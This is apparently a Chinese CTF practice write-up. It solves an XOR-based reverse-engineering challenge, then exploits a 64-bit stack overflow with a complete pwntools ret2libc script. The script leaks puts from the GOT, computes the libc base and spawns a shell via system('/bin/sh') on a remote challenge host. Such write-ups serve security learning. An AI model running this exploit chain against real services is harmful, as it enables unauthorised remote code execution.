0%

随便做的练习

Posted on Edited on In Views: Valine:
Symbols count in article: 2.4k Reading time ≈ 2 mins.

writeup-1-练习

简单的re

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edi
  unsigned __int64 i; // rsi
  int *v5; // rdx
  int v6; // ecx
  unsigned int v7; // eax
  __int64 v8; // rdx
  __int64 v10; // [rsp+0h] [rbp-78h]
  int v11; // [rsp+60h] [rbp-18h]
  unsigned __int64 v12; // [rsp+68h] [rbp-10h]

  v12 = __readfsqword(0x28u);
  _printf_chk(1LL, "input:", envp);
  memset(&v10, 0, 0x60uLL);
  v11 = 0;
  scanf("%s", &v10);
  v3 = 34;
  for ( i = 0LL; ; ++i )
  {
    v5 = (int *)&v10;
    do
    {
      v6 = *v5;
      ++v5;
      v7 = ~v6 & (v6 - 16843009) & 0x80808080;
    }
    while ( !v7 );
    if ( !(~v6 & (v6 - 16843009) & 0x8080) )
      v7 >>= 16;
    if ( !(~v6 & (v6 - 16843009) & 0x8080) )
      v5 = (int *)((char *)v5 + 2);
    if ( i >= (char *)v5 - __CFADD__((_BYTE)v7, (_BYTE)v7) - 3 - (char *)&v10 )
      break;
    *((_BYTE *)&v10 + i) ^= v3++;
  }
  if ( !memcmp(&szCmp, &v10, 0x16uLL) )
    _printf_chk(1LL, "right\n", v8);
  else
    _printf_chk(1LL, "wrong\n", v8);
  return 0;
}

刚看以为很复杂,后面发觉前面的都是校验,只要异或下就可以了

1
2
3
4
5
6
7
8
#!/usr/bin/env python
# coding=utf-8
List = [0x44, 0x4F, 0x45, 0x42, 0x5D, 0x1E, 0x1B, 0x19, 0x43, 0x7E, 0x61, 0x1F, 0x61, 0x59, 0x7B, 0x76, 0x78, 0x65, 0x0C, 0x03, 0x41, 0x4A]
flag = ""
for i in range(len(List)):
    flag += chr(List[i]^(0x22+i))

print(flag)

pwn

1
2
3
4
5
6
7
8
9
10
11
int vul()
{
  char buf; // [rsp+0h] [rbp-70h]
  int v2; // [rsp+60h] [rbp-10h]

  memset(&buf, 0, 0x60uLL);
  v2 = 0;
  puts("input your name:");
  read(0, &buf, 0x400uLL);
  return printf("hi,%s welcome to shanxi~!\n", &buf);
}

简单的栈溢出,64位,开头ropgadget坏了,折腾了一小会,然后exp很简单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = False


exe = './' + 'pwn'
elf = context.binary = ELF(exe)


host = '123.59.204.3'
port = 3333


if local:
    context.log_level = 'debug'
    io = process("./pwn")
else:
    io = remote(host,port)

def exp():
    libc = ELF("./libc.so.6")
    pop_rdi = 0x0000000000400863
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    ret_addr = 0x0000000000400776
    offset = 120
    payload = 'a'*120 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret_addr)
    io.sendline(payload)
    io.recvuntil("welcome to shanxi~!\n")
    puts_addr = u64(io.recvline().strip().ljust(8, '\x00'))
    io.success("puts_addr: 0x%x" % puts_addr)
    libc_base = puts_addr - libc.symbols['puts']
    system_addr = libc_base + libc.symbols['system']
    bin_sh_addr = libc_base + libc.search("/bin/sh").next()
    payload = 'a'*120 + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
    io.sendline(payload)



if __name__ == '__main__':
    exp()
    io.interactive()

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/8cd80461/
版权声明:转载请注明出处!